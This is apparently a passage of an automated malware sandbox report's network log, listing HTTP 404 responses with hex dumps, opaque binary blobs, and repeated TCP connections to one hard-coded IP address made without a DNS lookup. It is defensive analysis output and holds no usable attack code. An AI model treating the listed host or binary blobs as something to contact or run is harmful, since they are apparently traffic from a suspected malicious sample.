13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d c3 27 e7 0e f4 eb 7e 71 eb f0 f3 1a 68 c6 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 92 66 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f e3 05 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d d7 7d 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 77 b2 dc 8e 82 11 e8 e4 1f 84 a2 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 24 65 87 1f d4 ac 6b 91 9c 3d 07 f1 2c 80 ad 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 cc e4 8b 8b e1 12 7c d7 9c d6 c3 e0 2b 5b b0 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 20 d3 b9 e9 39 4c af 80 95 1c 54 4c 49 8f 88 8f 71 00 28 ae a1 b1 65 86 41 a9 a1 0d 61 7f 8e 4f 70 72 4d 39 bb 57 ea 38 15 66 78 40 e8 7d ec 82 b7 6a 05 03 11 2e 80 54 8b 9d 53 a1 2a f6 66 3f b0 46 7a da 73 be f0 29 c5 8b 78 27 43 1d a4 ac bf 6c 13 d9 a8 6a e5 36 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 50 53 a4 4c 5f ff 1d 09 52 2b e5 8d 83 7b 9e 45 f4 fe 73 8c 5c db c4 7f 10 13 bf 84 ea 92 24 08 4f c5 13 95 ca a1 61 6e de f5 69 29 1a 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4e 19 e0 2c 95 a9 1d 1a f5 96 be 25 51 61 9a 24 30 7c 88 2c c8 48 63 52 cd 4a 98 03 fd 6c 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 8f f1 f6 1a 38 9b 4a d8 19 8e c2 4f 2b bb 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 ff e6 ec e7 6e 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac cf 41 d9 55 7d af ba 68 92 0e ff 9d 7f 7f 55 40 57 74 7b 39 d6 e5 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 67 2f a2 90 4e b1 54 55 a5 fc b4 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 79 e4 6b b5 5c 68 91 94 a4 0c f1 2c ce ad 03 5b cf 16 e4 a6 0b 13 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 83 e2 cb f8 f9 82 62 7a d7 8c 4a c3 e0 2b 89 ba bb 01 be 17 28 d2 0e 4a 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 5c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 02 00 b4 60 3b d4 0f 1a 40 10 16 30 8f b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 53 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 1d 8f e2 e3 b3 98 30 06 81 8f f1 83 0e 25 a6 79 5e 5c 51 fb 32 35 47 48 3b fe cc bd 6c 62 ad 5d 6f 38 6d 57 12 73 36 18 28 a6 70 a3 d1 43 36 2f a4 14 0f 85 c2 e7 27 c2 25 7b ba 49 79 b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 28 c8 55 db 88 0c 15 13 2a 82 a3 b8 24 08 4f c5 03 a1 cb a1 81 7e 50 54 62 b8 1b 0e 7e cb aa 9a a5 92 db a0 c1 b9 dd 7a d5 31 4b 19 e0 3c 95 a9 18 aa f0 96 be 25 11 61 9a c4 3e 7c 88 2a c8 48 6f a1 c0 4a 9a 03 fd ec 9a aa 7b ac 87 2f bd 61 0d 10 45 bf 46 30 fd f8 12 6c 33 6c 2b 7c 0b 8d c7 fd e4 0e a4 eb 7e 71 eb 80 e5 1a 68 8b 4a d8 19 ae cc 4f 2b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2c b9 9e f1 cc 23 b2 d5 08 31 79 b0 82 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 11 3a 27 34 19 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 71 67 a3 1e 1e 54 ab 1e 3a ef 14 ee c3 de 57 a3 4c 89 80 1f d4 58 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 86 7d 10 ff 54 f8 8d f1 99 07 99 8a 29 c5 7f 74 79 e0 68 43 cc 9b 8b 8b e1 fa 7f d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 df 92 f2 f9 7a 8f f6 6b e3 0c c0 d9 37 00 60 e6 1c c9 20 f5 52 48 7e 3f 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 58 58 07 6b ab f6 ae 25 2e 73 89 ce ec 35 98 c5 a7 0d 88 ca d4 5f 93 46 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 81 c4 a1 f3 0b 0f bf c5 ac 8b c8 2f 2b 92 09 e8 8b 03 18 ac 18 ca 77 b3 0e 49 84 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 53 e8 b8 1c 6b 93 83 01 ee 43 d9 ed 07 90 40 dc 1a 3e 8d 18 57 03 13 7d 42 4f 87 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 33 0f b6 35 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 45 c0 5f 80 0d 80 b8 56 f0 67 a5 7c 0a 5f 78 a1 28 01 7c 89 Data Ascii: Uys/~(`:E_Vg|_x(|
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 11 Aug 2022 04:53:54 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4b c7 5f 83 04 86 b8 54 f2 67 a0 7d 1d 16 39 f5 71 02 6d 80 5d 67 0e 61 d4 Data Ascii: Uys/~(`:K_Tg}9qm]ga
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 1d 8f e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 94 4a ed e5 8d d5 fb 8c 21 85 00 40 fd 16 dc 83 6c bd e9 a3 1e 28 31 8a ff 09 65 00 4a e6 da 43 ce d2 9e 34 65 ce be 34 e6 43 53 4d 4a e4 b8 8e 63 89 53 0e 00 b7 d4 58 28 2e 10 ad de 6f 32 33 1a 8d bb d6 96 27 a4 25 0f 3a b8 2a de 84 f0 a0 82 ae 90 c0 1d f3 b1 3a 5c e4 74 4e 1f f0 e2 2a cc ad 78 4b 5c ee 22 70 71 d7 21 7d dc d6 ba 23 fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 28 c8 55 db 88 0c 16 13 27 e8 12 f0 24 08 4f c5 03 a1 cb a1 81 7e dc f4 62 b8 17 37 7e 75 ab 9a a5 20 c8 a0 c1 b9 dd 7a fd a3 4e 19 e0 3c 95 a9 18 5a f1 96 be 25 11 61 9a c4 3e 7c 88 2a c8 48 6d a1 c0 4a 9a 03 fd ec 98 aa 7b ac 87 2f bd 61 0d 10 58 bf 46 30 fd f8 12 6c 33 6c 2b 7c 4a 0c c7 fd f4 0e a4 fb 7e 71 eb 80 e5 1a 68 8b 4a d8 19 ae cc 4f 2b 79 82 ae 9c 97 02 4c 75 56 ad f3 d7 e2 2e b9 5a ee cc 23 b2 e5 0b 31 99 93 90 f7 df f5 ec e7 72 2b 4c 80 d0 92 fc 13 93 38 bb d6 af 91 39 27 04 4d b7 9f c3 0b c8 46 8d 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 18 46 46 40 37 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 70 16 51 c8 71 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 1c 5c 82 23 6a 54 ab 1e a0 55 15 ee c3 de 57 a3 4c 37 81 1f d4 58 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 86 7d 10 ff 3e cb bd d1 ed 66 99 8a 15 44 7f 74 79 10 69 43 cc 1b 8b 8b e1 4c 7e d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 5f fe c5 cb 0e ee f6 6b e3 ad 49 d9 37 00 70 e7 1c c9 a8 f5 52 48 14 3e 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 43 eb ac 58 58 1c 7c b8 e1 cf 25 2e 7f 97 ce ec 35 08 c6 a7 0d aa ca d4 5f 71 46 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 81 c4 a1 73 0b 0f bf c5 ac 8b c8 2f 1b c6 09 e8 8b 83 1b ac 18 9e 77 b3 0e c9 84 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 53 e8 b8 0e 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
